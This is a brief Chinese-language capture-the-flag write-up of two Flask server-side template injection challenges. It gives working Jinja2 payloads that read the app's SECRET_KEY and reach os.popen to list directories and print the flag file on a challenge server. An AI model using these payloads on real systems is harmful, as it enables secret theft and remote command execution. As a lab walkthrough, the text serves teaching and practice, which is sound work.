Simple_SSTI_1
1.这里告诉我们需要传一个flag的参数
2.我们f12查看这里提示我们
如图所示,我们会得到相关的提示,根据提示信息,我们利用flask的模板注入,就能直接得到flag。
3.这里我们利用flask的模板注入
/?flag={{config.SECRET_KEY}}
Simple_SSTI_2
1.这里我们看到需要我们注入一个flag参数
2.我们同样的去查看页面源代码
发现没什么可用信息
3.这里我们去传入flag查看config
http://114.67.175.224:10934/?flag={{config}}
发现页面很乱,不能得到有用信息
4.我们尝试SSTI模版注入
/?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
我们看到了很多目录
5.我们依次读取目录看看\
/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
我们发现了flage目录,
6.我们查看flage
/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat flag').read() }}
我们发现了flag